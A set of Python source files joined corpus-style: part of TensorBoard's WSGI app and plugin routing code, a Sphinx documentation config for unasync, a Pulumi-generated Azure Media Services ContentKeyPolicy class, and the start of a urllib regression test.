db_uri = 'sqlite:%s/tmp.sqlite' % tmpdir
db_connection_provider = create_sqlite_connection_provider(db_uri)
logger.info('Importing logdir into DB at %s', db_uri)
multiplexer = db_import_multiplexer.DbImportMultiplexer(
db_uri=db_uri,
db_connection_provider=db_connection_provider,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads)
elif flags.db:
# DB read-only mode, never load event logs.
reload_interval = -1
db_connection_provider = create_sqlite_connection_provider(flags.db)
multiplexer = _DbModeMultiplexer(flags.db, db_connection_provider)
else:
# Regular logdir loading mode.
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance_from_flags(flags),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags))
if flags.generic_data != 'false':
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugin loader instances.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
:type plugins: list[base_plugin.TBLoader]
"""
db_uri = None
db_connection_provider = None
if isinstance(
deprecated_multiplexer,
(db_import_multiplexer.DbImportMultiplexer, _DbModeMultiplexer)):
db_uri = deprecated_multiplexer.db_uri
db_connection_provider = deprecated_multiplexer.db_connection_provider
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
db_connection_provider=db_connection_provider,
db_uri=db_uri,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
window_title=flags.window_title)
tbplugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
plugin = loader.load(context)
if plugin is None:
continue
tbplugins.append(plugin)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(tbplugins, flags.path_prefix)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(self, plugins, path_prefix=''):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
flags: An argparse.Namespace containing TensorBoard CLI flags.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
if self._path_prefix.endswith('/'):
# Should have been fixed by `fix_flags`.
raise ValueError('Trailing slash in path prefix: %r' % self._path_prefix)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError('Plugin %s has no plugin_name' % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError('Plugin %s has invalid name %r' % (plugin,
plugin.plugin_name))
if plugin.plugin_name in plugin_names_encountered:
raise ValueError('Duplicate plugins for name %s' % plugin.plugin_name)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
raise
logger.warn('Plugin %s failed. Exception: %s',
plugin.plugin_name, str(e))
continue
for route, app in plugin_apps.items():
if not route.startswith('/'):
raise ValueError('Plugin named %r handles invalid route %r: '
'route does not start with a slash' %
(plugin.plugin_name, route))
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX + PLUGIN_PREFIX + '/' + plugin.plugin_name + route
)
if path.endswith('/*'):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if '*' in path:
# note we re-add the removed * in the format string
raise ValueError('Plugin %r handles invalid route \'%s*\': Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
unordered_prefix_routes[path] = app
else:
if '*' in path:
raise ValueError('Plugin %r handles invalid route %r: Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True))
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get('name')
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
# Technically is not possible as plugin names are unique and is checked
# by the check on __init__.
reason = (
'Plugin invariant error: multiple plugins with name '
'{name} found: {list}'
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, 'Plugin is not module loadable', 'text/plain', code=400)
# non-self origin is blocked by CSP but this is a good invariant checking.
if urlparse.urlparse(module_path).netloc:
raise ValueError('Expected es_module_path to be non-absolute path')
module_json = json.dumps('.' + module_path)
script_content = 'import({}).then((m) => void m.render());'.format(
module_json)
digest = hashlib.sha256(script_content.encode('utf-8')).digest()
script_sha = base64.b64encode(digest).decode('ascii')
html = textwrap.dedent("""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
""").format(name=name, script_content=script_content)
return http_util.Respond(
request,
html,
'text/html',
csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
for plugin in self._plugins:
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
'Plugin listing: is_active() for %s took %0.3f seconds',
plugin.plugin_name, elapsed)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
'disable_reload': plugin_metadata.disable_reload,
'enabled': is_active,
# loading_mechanism set below
'remove_dom': plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata['tab_name'] = plugin_metadata.tab_name
else:
output_metadata['tab_name'] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
if element_name is not None and es_module_handler is not None:
logger.error(
'Plugin %r declared as both legacy and iframed; skipping',
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
'type': 'CUSTOM_ELEMENT',
'element_name': element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
'type': 'IFRAME',
'module_path': ''.join([
request.script_root, DATA_PREFIX, PLUGIN_PREFIX, '/',
plugin.plugin_name, es_module_handler,
]),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
'type': 'NONE',
}
output_metadata['loading_mechanism'] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, 'application/json')
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](environ, start_response)
logger.warn('path %s not found, sending 404', clean_path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)(
environ, start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir_spec.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon. If the spec looks like
# [a-zA-z]:\foo then we assume its a Windows path and not a single letter
# group
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/' and not os.path.splitdrive(specification)[0]):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval,
reload_task):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError('load_interval is negative: %d' % load_interval)
def _reload():
while True:
start = time.time()
logger.info('TensorBoard reload process beginning')
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logger.info('TensorBoard done reloading. Load took %0.3f secs', duration)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == 'process':
logger.info('Launching reload in a child process')
import multiprocessing
process = multiprocessing.Process(target=_reload, name='Reloader')
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ('thread', 'auto'):
logger.info('Launching reload in a daemon thread')
thread = threading.Thread(target=_reload, name='Reloader')
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == 'blocking':
if load_interval != 0:
raise ValueError('blocking reload only allowed with load_interval=0')
_reload()
else:
raise ValueError('unrecognized reload_task: %s' % reload_task)
def create_sqlite_connection_provider(db_uri):
"""Returns function that returns SQLite Connection objects.
Args:
db_uri: A string URI expressing the DB file, e.g. "sqlite:~/tb.db".
Returns:
A function that returns a new PEP-249 DB Connection, which must be closed,
each time it is called.
Raises:
ValueError: If db_uri is not a valid sqlite file URI.
"""
uri = urlparse.urlparse(db_uri)
if uri.scheme != 'sqlite':
raise ValueError('Only sqlite DB URIs are supported: ' + db_uri)
if uri.netloc:
raise ValueError('Can not connect to SQLite over network: ' + db_uri)
if uri.path == ':memory:':
raise ValueError('Memory mode SQLite not supported: ' + db_uri)
path = os.path.expanduser(uri.path)
params = _get_connect_params(uri.query)
# TODO(@jart): Add thread-local pooling.
return lambda: sqlite3.connect(path, **params)
def _get_connect_params(query):
params = urlparse.parse_qs(query)
if any(len(v) > 2 for v in params.values()):
raise ValueError('DB URI params list has duplicate keys: ' + query)
return {k: json.loads(v[0]) for k, v in params.items()}
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != '/' and path.endswith('/'):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
class _DbModeMultiplexer(event_multiplexer.EventMultiplexer):
"""Shim EventMultiplexer to use when in read-only DB mode.
In read-only DB mode, the EventMultiplexer is nonfunctional - there is no
logdir to reload, and the data is all exposed via SQL. This class represents
the do-nothing EventMultiplexer for that purpose, which serves only as a
conduit for DB-related parameters.
The load APIs raise exceptions if called, and the read APIs always
return empty results.
"""
def __init__(self, db_uri, db_connection_provider):
"""Constructor for `_DbModeMultiplexer`.
Args:
db_uri: A URI to the database file in use.
db_connection_provider: Provider function for creating a DB connection.
"""
logger.info('_DbModeMultiplexer initializing for %s', db_uri)
super(_DbModeMultiplexer, self).__init__()
self.db_uri = db_uri
self.db_connection_provider = db_connection_provider
logger.info('_DbModeMultiplexer done initializing')
def AddRun(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def AddRunsFromDirectory(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def Reload(self):
"""Unsupported."""
raise NotImplementedError()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
:type plugin_spec:
Type[base_plugin.TBPlugin] | Type[base_plugin.TBLoader] |
base_plugin.TBLoader
:rtype: base_plugin.TBLoader
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
py | 1a32f4235cf9e1e025664ee5c7d24b187c5d26d3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Documentation build configuration file, created by
# sphinx-quickstart on Sat Jan 21 19:11:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# So autodoc can import our package
sys.path.insert(0, os.path.abspath("../.."))
# Warn about all references to unknown targets
nitpicky = True
# Except for these ones, which we expect to point to unknown targets:
nitpick_ignore = [
# Format is ("sphinx reference type", "string"), e.g.:
("py:obj", "bytes-like")
]
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.napoleon",
"sphinxcontrib_trio",
]
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"trio": ("https://trio.readthedocs.io/en/stable", None),
}
autodoc_member_order = "bysource"
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "unasync"
copyright = "The unasync authors"
author = "The unasync authors"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import unasync
version = unasync.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# The default language for :: blocks
highlight_language = "python3"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
# We have to set this ourselves, not only because it's useful for local
# testing, but also because if we don't then RTD will throw away our
# html_theme_options.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# default is 2
# show deeper nesting in the RTD theme's sidebar TOC
# https://stackoverflow.com/questions/27669376/
# I'm not 100% sure this actually does anything with our current
# versions/settings...
"navigation_depth": 4,
"logo_only": True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "unasyncdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [(master_doc, "unasync.tex", "Trio Documentation", author, "manual")]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "unasync", "unasync Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"unasync",
"unasync Documentation",
author,
"unasync",
"The async transformation code.",
"Miscellaneous",
)
]
|
py | 1a32f4913fb10302cdbf8dc6970d5524842e9f8b | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ContentKeyPolicyArgs', 'ContentKeyPolicy']
@pulumi.input_type
class ContentKeyPolicyArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
options: pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]],
resource_group_name: pulumi.Input[str],
content_key_policy_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ContentKeyPolicy resource.
:param pulumi.Input[str] account_name: The Media Services account name.
:param pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]] options: The Key Policy options.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the Azure subscription.
:param pulumi.Input[str] content_key_policy_name: The Content Key Policy name.
:param pulumi.Input[str] description: A description for the Policy.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "options", options)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if content_key_policy_name is not None:
pulumi.set(__self__, "content_key_policy_name", content_key_policy_name)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The Media Services account name.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def options(self) -> pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]]:
"""
The Key Policy options.
"""
return pulumi.get(self, "options")
@options.setter
def options(self, value: pulumi.Input[Sequence[pulumi.Input['ContentKeyPolicyOptionArgs']]]):
pulumi.set(self, "options", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group within the Azure subscription.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="contentKeyPolicyName")
def content_key_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The Content Key Policy name.
"""
return pulumi.get(self, "content_key_policy_name")
@content_key_policy_name.setter
def content_key_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_key_policy_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for the Policy.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
class ContentKeyPolicy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
content_key_policy_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContentKeyPolicyOptionArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Content Key Policy resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The Media Services account name.
:param pulumi.Input[str] content_key_policy_name: The Content Key Policy name.
:param pulumi.Input[str] description: A description for the Policy.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContentKeyPolicyOptionArgs']]]] options: The Key Policy options.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the Azure subscription.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContentKeyPolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Content Key Policy resource.
:param str resource_name: The name of the resource.
:param ContentKeyPolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContentKeyPolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
content_key_policy_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
options: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ContentKeyPolicyOptionArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContentKeyPolicyArgs.__new__(ContentKeyPolicyArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["content_key_policy_name"] = content_key_policy_name
__props__.__dict__["description"] = description
if options is None and not opts.urn:
raise TypeError("Missing required property 'options'")
__props__.__dict__["options"] = options
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["created"] = None
__props__.__dict__["last_modified"] = None
__props__.__dict__["name"] = None
__props__.__dict__["policy_id"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:media/v20180701:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20180330preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20180330preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20180601preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20180601preview:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20200501:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20200501:ContentKeyPolicy"), pulumi.Alias(type_="azure-native:media/v20210601:ContentKeyPolicy"), pulumi.Alias(type_="azure-nextgen:media/v20210601:ContentKeyPolicy")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ContentKeyPolicy, __self__).__init__(
'azure-native:media/v20180701:ContentKeyPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ContentKeyPolicy':
"""
Get an existing ContentKeyPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ContentKeyPolicyArgs.__new__(ContentKeyPolicyArgs)
__props__.__dict__["created"] = None
__props__.__dict__["description"] = None
__props__.__dict__["last_modified"] = None
__props__.__dict__["name"] = None
__props__.__dict__["options"] = None
__props__.__dict__["policy_id"] = None
__props__.__dict__["type"] = None
return ContentKeyPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def created(self) -> pulumi.Output[str]:
"""
The creation date of the Policy
"""
return pulumi.get(self, "created")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for the Policy.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="lastModified")
def last_modified(self) -> pulumi.Output[str]:
"""
The last modified date of the Policy
"""
return pulumi.get(self, "last_modified")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def options(self) -> pulumi.Output[Sequence['outputs.ContentKeyPolicyOptionResponse']]:
"""
The Key Policy options.
"""
return pulumi.get(self, "options")
@property
@pulumi.getter(name="policyId")
def policy_id(self) -> pulumi.Output[str]:
"""
The legacy Policy ID.
"""
return pulumi.get(self, "policy_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
|
py | 1a32f537038d178cee63fa11fab209ac95c93828 | """Regresssion tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import StringIO
def hexescape(char):
